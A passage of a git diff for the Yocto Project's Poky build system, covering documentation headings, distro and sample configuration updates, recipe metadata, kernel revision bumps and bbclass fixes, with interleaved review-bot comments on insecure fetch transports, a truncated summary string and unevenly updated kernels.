65- :yocto_docs:`2.4.4 Documentation </2.4.4>` 105- :yocto_docs:`2.4.4 Documentation </2.4.4>`
66 106
67************************* 107*************************
682.3 'pyro' Release Series 108Release Series 2.3 (pyro)
69************************* 109*************************
70 110
71- :yocto_docs:`2.3 Documentation </2.3>` 111- :yocto_docs:`2.3 Documentation </2.3>`
@@ -75,7 +115,7 @@
75- :yocto_docs:`2.3.4 Documentation </2.3.4>` 115- :yocto_docs:`2.3.4 Documentation </2.3.4>`
76 116
77************************** 117**************************
782.2 'morty' Release Series 118Release Series 2.2 (morty)
79************************** 119**************************
80 120
81- :yocto_docs:`2.2 Documentation </2.2>` 121- :yocto_docs:`2.2 Documentation </2.2>`
@@ -84,7 +124,7 @@
84- :yocto_docs:`2.2.3 Documentation </2.2.3>` 124- :yocto_docs:`2.2.3 Documentation </2.2.3>`
85 125
86**************************** 126****************************
872.1 'krogoth' Release Series 127Release Series 2.1 (krogoth)
88**************************** 128****************************
89 129
90- :yocto_docs:`2.1 Documentation </2.1>` 130- :yocto_docs:`2.1 Documentation </2.1>`
@@ -93,7 +133,7 @@
93- :yocto_docs:`2.1.3 Documentation </2.1.3>` 133- :yocto_docs:`2.1.3 Documentation </2.1.3>`
94 134
95*************************** 135***************************
962.0 'jethro' Release Series 136Release Series 2.0 (jethro)
97*************************** 137***************************
98 138
99- :yocto_docs:`1.9 Documentation </1.9>` 139- :yocto_docs:`1.9 Documentation </1.9>`
@@ -103,7 +143,7 @@
103- :yocto_docs:`2.0.3 Documentation </2.0.3>` 143- :yocto_docs:`2.0.3 Documentation </2.0.3>`
104 144
105************************* 145*************************
1061.8 'fido' Release Series 146Release Series 1.8 (fido)
107************************* 147*************************
108 148
109- :yocto_docs:`1.8 Documentation </1.8>` 149- :yocto_docs:`1.8 Documentation </1.8>`
@@ -111,7 +151,7 @@
111- :yocto_docs:`1.8.2 Documentation </1.8.2>` 151- :yocto_docs:`1.8.2 Documentation </1.8.2>`
112 152
113************************** 153**************************
1141.7 'dizzy' Release Series 154Release Series 1.7 (dizzy)
115************************** 155**************************
116 156
117- :yocto_docs:`1.7 Documentation </1.7>` 157- :yocto_docs:`1.7 Documentation </1.7>`
@@ -120,16 +160,16 @@
120- :yocto_docs:`1.7.3 Documentation </1.7.3>` 160- :yocto_docs:`1.7.3 Documentation </1.7.3>`
121 161
122************************** 162**************************
1231.6 'daisy' Release Series 163Release Series 1.6 (daisy)
124************************** 164**************************
125 165
126- :yocto_docs:`1.6 Documentation </1.6>` 166- :yocto_docs:`1.6 Documentation </1.6>`
127- :yocto_docs:`1.6.1 Documentation </1.6.1>` 167- :yocto_docs:`1.6.1 Documentation </1.6.1>`
128- :yocto_docs:`1.6.2 Documentation </1.6.2>` 168- :yocto_docs:`1.6.2 Documentation </1.6.2>`
129- :yocto_docs:`1.6.3 Documentation </1.6.3>` 169- :yocto_docs:`1.6.3 Documentation </1.6.3>`
130 170
131************************* 171*************************
1321.5 'dora' Release Series 172Release Series 1.5 (dora)
133************************* 173*************************
134 174
135- :yocto_docs:`1.5 Documentation </1.5>` 175- :yocto_docs:`1.5 Documentation </1.5>`
@@ -139,7 +179,7 @@
139- :yocto_docs:`1.5.4 Documentation </1.5.4>` 179- :yocto_docs:`1.5.4 Documentation </1.5.4>`
140 180
141************************** 181**************************
1421.4 'dylan' Release Series 182Release Series 1.4 (dylan)
143************************** 183**************************
144 184
145- :yocto_docs:`1.4 Documentation </1.4>` 185- :yocto_docs:`1.4 Documentation </1.4>`
@@ -148,9 +188,9 @@
148- :yocto_docs:`1.4.3 Documentation </1.4.3>` 188- :yocto_docs:`1.4.3 Documentation </1.4.3>`
149- :yocto_docs:`1.4.4 Documentation </1.4.4>` 189- :yocto_docs:`1.4.4 Documentation </1.4.4>`
150- :yocto_docs:`1.4.5 Documentation </1.4.5>` 190- :yocto_docs:`1.4.5 Documentation </1.4.5>`
151 191
152************************** 192**************************
1531.3 'danny' Release Series 193Release Series 1.3 (danny)
154************************** 194**************************
155 195
156- :yocto_docs:`1.3 Documentation </1.3>` 196- :yocto_docs:`1.3 Documentation </1.3>`
@@ -158,7 +198,7 @@
158- :yocto_docs:`1.3.2 Documentation </1.3.2>` 198- :yocto_docs:`1.3.2 Documentation </1.3.2>`
159 199
160*************************** 200***************************
1611.2 'denzil' Release Series 201Release Series 1.2 (denzil)
162*************************** 202***************************
163 203
164- :yocto_docs:`1.2 Documentation </1.2>` 204- :yocto_docs:`1.2 Documentation </1.2>`
@@ -166,7 +206,7 @@
166- :yocto_docs:`1.2.2 Documentation </1.2.2>` 206- :yocto_docs:`1.2.2 Documentation </1.2.2>`
167 207
168*************************** 208***************************
1691.1 'edison' Release Series 209Release Series 1.1 (edison)
170*************************** 210***************************
171 211
172- :yocto_docs:`1.1 Documentation </1.1>` 212- :yocto_docs:`1.1 Documentation </1.1>`
@@ -174,7 +214,7 @@
174- :yocto_docs:`1.1.2 Documentation </1.1.2>` 214- :yocto_docs:`1.1.2 Documentation </1.1.2>`
175 215
176**************************** 216****************************
1771.0 'bernard' Release Series 217Release Series 1.0 (bernard)
178**************************** 218****************************
179 219
180- :yocto_docs:`1.0 Documentation </1.0>` 220- :yocto_docs:`1.0 Documentation </1.0>`
@@ -182,7 +222,7 @@
182- :yocto_docs:`1.0.2 Documentation </1.0.2>` 222- :yocto_docs:`1.0.2 Documentation </1.0.2>`
183 223
184**************************** 224****************************
1850.9 'laverne' Release Series 225Release Series 0.9 (laverne)
186**************************** 226****************************
187 227
188- :yocto_docs:`0.9 Documentation </0.9>` 228- :yocto_docs:`0.9 Documentation </0.9>`
diff --git a/documentation/sphinx-static/switchers.js b/documentation/sphinx-static/switchers.js
index b28d91c080..1d65fa7fae 100644
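--- a/documentation/sphinx-static/switchers.js
+++ b/documentation/sphinx-static/switchers.js
@@ -2,8 +2,11 @@
  'use strict';
 
  var all_versions = {
- 'dev': 'dev (3.2)',
- '3.1.3': '3.1.3',
+ 'dev': 'dev (3.5)',
+ '3.4.1': '3.4.1',
+ '3.3.4': '3.3.4',
+ '3.2.4': '3.2.4',
+ '3.1.14': '3.1.14',
  '3.0.4': '3.0.4',
  '2.7.4': '2.7.4',
  };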
diff --git a/documentation/toaster-manual/toaster-manual-reference.rst b/documentation/toaster-manual/toaster-manual-reference.rst
index e5e3531e83..bd3a060eee 100644
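--- a/documentation/toaster-manual/toaster-manual-reference.rst
+++ b/documentation/toaster-manual/toaster-manual-reference.rst
@@ -173,13 +173,13 @@ As shipped, Toaster is configured to work with the following releases:
 - *Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":*
  This release causes your Toaster projects to build against the head
  of the &DISTRO_NAME_NO_CAP; branch at
- https://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP; or
+ :yocto_git:`/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;` or
  http://git.openembedded.org/openembedded-core/commit/?h=&DISTRO_NAME_NO_CAP;.
 
 - *Yocto Project "Master" or OpenEmbedded "Master":* This release
  causes your Toaster Projects to build against the head of the master
  branch, which is where active development takes place, at
- https://git.yoctoproject.org/cgit/cgit.cgi/poky/log/ or
+ :yocto_git:`/cgit/cgit.cgi/poky/log/` or
  http://git.openembedded.org/openembedded-core/log/.
 
 - *Local Yocto Project or Local OpenEmbedded:* This release causes your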
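diff --git a/meta-poky/conf/distro/poky-tiny.conf b/meta-poky/conf/distro/poky-tiny.conf
index c6d4b88f83..f20cd4ced2 100644
--- a/meta-poky/conf/distro/poky-tiny.conf
+++ b/meta-poky/conf/distro/poky-tiny.conf
@@ -38,7 +38,7 @@ TCLIBC = "musl"
 # Distro config is evaluated after the machine config, so we have to explicitly
 # set the kernel provider to override a machine config.
 PREFERRED_PROVIDER_virtual/kernel = "linux-yocto-tiny"
-PREFERRED_VERSION_linux-yocto-tiny ?= "5.0%"
+PREFERRED_VERSION_linux-yocto-tiny ?= "5.4%"
 
 # We can use packagegroup-core-boot, but in the future we may need a new packagegroup-core-tiny
 #POKY_DEFAULT_EXTRA_RDEPENDS += "packagegroup-core-boot"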
diff --git a/meta-poky/conf/distro/poky.conf b/meta-poky/conf/distro/poky.conf
index 521109bd05..25b0c8e608 100644
--- a/meta-poky/conf/distro/poky.conf
+++ b/meta-poky/conf/distro/poky.conf
@@ -1,6 +1,6 @@
1DISTRO = "poky" 1DISTRO = "poky"
2DISTRO_NAME = "Poky (Yocto Project Reference Distro)" 2DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
3DISTRO_VERSION = "3.1.6" 3DISTRO_VERSION = "3.1.33"
4DISTRO_CODENAME = "dunfell" 4DISTRO_CODENAME = "dunfell"
5SDK_VENDOR = "-pokysdk" 5SDK_VENDOR = "-pokysdk"
6SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}" 6SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}"
@@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}"
24PREFERRED_VERSION_linux-yocto ?= "5.4%" 24PREFERRED_VERSION_linux-yocto ?= "5.4%"
25 25
26SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}" 26SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}"
27SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}" 27SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}"
28 28
29DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}" 29DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}"
30DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}" 30DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}"
@@ -39,33 +39,17 @@ DISTRO_EXTRA_RDEPENDS_append_qemux86-64 = " ${POKYQEMUDEPS}"
39 39
40TCLIBCAPPEND = "" 40TCLIBCAPPEND = ""
41 41
42PREMIRRORS ??= "\
43bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
44cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
45git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
46gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
47hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
48osc://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
49p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
50svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n"
51
52SANITY_TESTED_DISTROS ?= " \ 42SANITY_TESTED_DISTROS ?= " \
53 poky-2.7 \n \ 43 poky-2.7 \n \
54 poky-3.0 \n \ 44 poky-3.0 \n \
55 poky-3.1 \n \ 45 poky-3.1 \n \
56 ubuntu-16.04 \n \
57 ubuntu-18.04 \n \ 46 ubuntu-18.04 \n \
58 ubuntu-19.04 \n \
59 ubuntu-20.04 \n \ 47 ubuntu-20.04 \n \
60 fedora-30 \n \ 48 ubuntu-22.04 \n \
61 fedora-31 \n \ 49 fedora-37 \n \
62 fedora-32 \n \ 50 debian-11 \n \
63 centos-7 \n \ 51 opensuseleap-15.3 \n \
64 centos-8 \n \ 52 almalinux-8.8 \n \
65 debian-8 \n \
66 debian-9 \n \
67 debian-10 \n \
68 opensuseleap-15.1 \n \
69 " 53 "
70# add poky sanity bbclass 54# add poky sanity bbclass
71INHERIT += "poky-sanity" 55INHERIT += "poky-sanity"
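diff --git a/meta-poky/conf/local.conf.sample b/meta-poky/conf/local.conf.sample
index b555f1d21e..ea37a801aa 100644
--- a/meta-poky/conf/local.conf.sample
+++ b/meta-poky/conf/local.conf.sample
@@ -231,7 +231,7 @@ BB_DISKMON_DIRS ??= "\
 # present in the cache. It assumes you can download something faster than you can build it
 # which will depend on your network.
 #
-#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/2.5/PATH;downloadfilename=PATH"
+#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
 
 #
 # Qemu configuration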
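Review bot: The sample `SSTATE_MIRRORS` line still points at the mirror over plain `http://`. Shared-state objects are prebuilt task output that the build reuses instead of compiling, so anything able to alter the transfer can change what ends up in an image unless the objects are verified separately. If the mirror is reachable over TLS, the example would be safer as `#SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"`. Whatever the scheme, the comment block above the line could gain one sentence such as `# Consider SSTATE_VERIFY_SIG when pulling sstate from a mirror you do not control.`, with the caveat that this only helps when the mirror publishes signed objects.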
diff --git a/meta-poky/conf/local.conf.sample.extended b/meta-poky/conf/local.conf.sample.extended
index dc92a16f6c..9e857360ae 100644
--- a/meta-poky/conf/local.conf.sample.extended
+++ b/meta-poky/conf/local.conf.sample.extended
@@ -328,7 +328,7 @@ DISTRO_FEATURES_remove = "x11"
328# The INITRAMFS_IMAGE image variable will cause an additional recipe to 328# The INITRAMFS_IMAGE image variable will cause an additional recipe to
329# be built as a dependency to the what ever rootfs recipe you might be 329# be built as a dependency to the what ever rootfs recipe you might be
330# using such as core-image-sato. The initramfs might be needed for 330# using such as core-image-sato. The initramfs might be needed for
331# the initial boot of of the target system such as to load kernel 331# the initial boot of the target system such as to load kernel
332# modules prior to mounting the root file system. 332# modules prior to mounting the root file system.
333# 333#
334# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe 334# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -368,20 +368,9 @@ DISTRO_FEATURES_remove = "x11"
368# 368#
369 369
370# 370#
371# Use busybox/mdev for system initialization 371# System initialization
372# 372#
373#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev" 373#INIT_MANAGER = "none"
374#VIRTUAL-RUNTIME_login_manager = "busybox" 374#INIT_MANAGER = "sysvinit"
375#VIRTUAL-RUNTIME_init_manager = "busybox" 375#INIT_MANAGER = "systemd"
376#VIRTUAL-RUNTIME_initscripts = "initscripts" 376#INIT_MANAGER = "mdev-busybox"
377#VIRTUAL-RUNTIME_keymaps = "keymaps"
378#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
379
380#
381# Use systemd for system initialization
382#
383#DISTRO_FEATURES_append = " systemd"
384#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
385#VIRTUAL-RUNTIME_login_manager = "shadow-base"
386#VIRTUAL-RUNTIME_init_manager = "systemd"
387#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
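diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
 
 SUMMARY = "GNU Aspell spell-checker"
 SECTION = "console/utils"
+HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
 
 LICENSE = "LGPLv2 | LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"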
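diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
 PV = "0.1+git${SRCPV}"
 PR = "r2"
 
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
 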
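Review bot: The updated `SRC_URI` pins the branch but gives no `protocol=` parameter, so the fetch stays on the unauthenticated `git://` transport. `SRCREV` is a full commit hash, which ties the checked-out content to that object id, but nothing authenticates the server or protects the transfer. If the host serves the repository over HTTPS, `SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master;protocol=https"` closes that gap. The matching line in `devtool-upgrade-test2_git.bb.upgraded` would presumably need the identical change so the expected-output file used by the devtool upgrade selftest stays in step.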
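diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
 SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
 PV = "0.1+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
 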
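diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
 SUMMARY = "An image used during oe-selftest tests"
 
-IMAGE_INSTALL = "packagegroup-core-boot dropbear"
+IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
 IMAGE_FEATURES = "debug-tweaks"
 
 IMAGE_LINGUAS = " "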
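diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
 
 require recipeutils-test.inc
 
-LICENSE = "Proprietary"
+LICENSE = "HPND"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
 DEPENDS += "zlib"
 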
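diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
 HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
+DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
 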
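diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Example of how to build an external Linux kernel module"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
 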
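diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
+SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
 # linux-yocto-custom.bb:
 #
-# An example kernel recipe that uses the linux-yocto and oe-core
 # kernel classes to apply a subset of yocto kernel management to git
 # managed kernel repositories.
 #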
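Review bot: The new `SUMMARY` value is only the first half of a sentence lifted from the header comment, so it ends on a dangling "and oe-core". The comment left behind now starts mid-sentence at "kernel classes to apply a subset of yocto kernel management". A self-contained value such as `SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core kernel classes"` reads correctly wherever the summary is shown, and the header comment stays intelligible if its original first line is kept rather than removed.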
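diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
-#
-# An example of a multilib image
+SUMMARY = "An example of a multilib image"
 #
 # This example includes a lib32 version of bash into an otherwise standard
 # sato image. It assumes a "lib32" multilib has been enabled in the user's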
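diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "The canonical example of init scripts"
 SECTION = "base"
+DESCRIPTION = "This recipe is a canonical example of init scripts"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
 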
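diff --git a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
index 9c37f91bc1..fbe039aa95 100644
--- a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
+++ b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
@@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc"
 KMACHINE_genericx86-64 ?= "common-pc-64"
 KMACHINE_beaglebone-yocto ?= "beaglebone"
 
-SRCREV_machine_genericx86 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
-SRCREV_machine_genericx86-64 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
+SRCREV_machine_genericx86 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
+SRCREV_machine_genericx86-64 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
 SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
 SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
 
@@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
 COMPATIBLE_MACHINE_edgerouter = "edgerouter"
 COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
 
-LINUX_VERSION_genericx86 = "5.4.58"
-LINUX_VERSION_genericx86-64 = "5.4.58"
+LINUX_VERSION_genericx86 = "5.4.219"
+LINUX_VERSION_genericx86-64 = "5.4.219"
 LINUX_VERSION_edgerouter = "5.4.58"
 LINUX_VERSION_beaglebone-yocto = "5.4.58"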
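Review bot: Only the two genericx86 machines move forward in this file. `SRCREV_machine_edgerouter` and `SRCREV_machine_beaglebone-yocto` keep the old revision, and in the second hunk `LINUX_VERSION_edgerouter` and `LINUX_VERSION_beaglebone-yocto` stay at "5.4.58". As far as this file shows, those two reference BSPs keep building a kernel without the stable fixes made between 5.4.58 and 5.4.219, security fixes included. If the split is deliberate, for example because the boards were not retested, a comment above the pinned lines should say so. Otherwise the four assignments should be bumped together.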
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 7ca35a573b..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -54,9 +54,10 @@ ARCHIVER_MODE[mirror] ?= "split"
54 54
55DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources" 55DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
56ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources" 56ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
57ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/" 57ARCHIVER_ARCH = "${TARGET_SYS}"
58ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
58ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm" 59ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
59ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/" 60ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
60ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/" 61ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
61 62
62# When producing a combined mirror directory, allow duplicates for the case 63# When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
100 bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn) 101 bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
101 return 102 return
102 103
104 # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
105 if pn.startswith('gcc-source'):
106 d.setVar('ARCHIVER_ARCH', "allarch")
107
103 def hasTask(task): 108 def hasTask(task):
104 return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False)) 109 return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
105 110
@@ -281,7 +286,10 @@ python do_ar_configured() {
281 # ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the 286 # ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
282 # do_configure, we archive the already configured ${S} to 287 # do_configure, we archive the already configured ${S} to
283 # instead of. 288 # instead of.
284 elif pn != 'libtool-native': 289 # The kernel class functions require it to be on work-shared, we
290 # don't unpack, patch, configure again, just archive the already
291 # configured ${S}
292 elif not (pn == 'libtool-native' or is_work_shared(d)):
285 def runTask(task): 293 def runTask(task):
286 prefuncs = d.getVarFlag(task, 'prefuncs') or '' 294 prefuncs = d.getVarFlag(task, 'prefuncs') or ''
287 for func in prefuncs.split(): 295 for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
484 src_orig = '%s.orig' % src 492 src_orig = '%s.orig' % src
485 oe.path.copytree(src, src_orig) 493 oe.path.copytree(src, src_orig)
486 494
495 if bb.data.inherits_class('dos2unix', d):
496 bb.build.exec_func('do_convert_crlf_to_lf', d)
497
487 # Make sure gcc and kernel sources are patched only once 498 # Make sure gcc and kernel sources are patched only once
488 if not (d.getVar('SRC_URI') == "" or is_work_shared(d)): 499 if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
489 bb.build.exec_func('do_patch', d) 500 bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
572 583
573SSTATETASKS += "do_deploy_archives" 584SSTATETASKS += "do_deploy_archives"
574do_deploy_archives () { 585do_deploy_archives () {
575 echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}." 586 bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
576} 587}
577python do_deploy_archives_setscene () { 588python do_deploy_archives_setscene () {
578 sstate_setscene(d) 589 sstate_setscene(d)
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 8a1b5f79c1..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
122 tools = d.getVar(toolsvar).split() 122 tools = d.getVar(toolsvar).split()
123 origbbenv = d.getVar("BB_ORIGENV", False) 123 origbbenv = d.getVar("BB_ORIGENV", False)
124 path = origbbenv.getVar("PATH") 124 path = origbbenv.getVar("PATH")
125 # Need to ignore our own scripts directories to avoid circular links
126 for p in path.split(":"):
127 if p.endswith("/scripts"):
128 path = path.replace(p, "/ignoreme")
125 bb.utils.mkdirhier(dest) 129 bb.utils.mkdirhier(dest)
126 notfound = [] 130 notfound = []
127 for tool in tools: 131 for tool in tools:
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
135 # /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc) 139 # /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
136 # would return /usr/local/bin/ccache/gcc, but what we need is 140 # would return /usr/local/bin/ccache/gcc, but what we need is
137 # /usr/bin/gcc, this code can check and fix that. 141 # /usr/bin/gcc, this code can check and fix that.
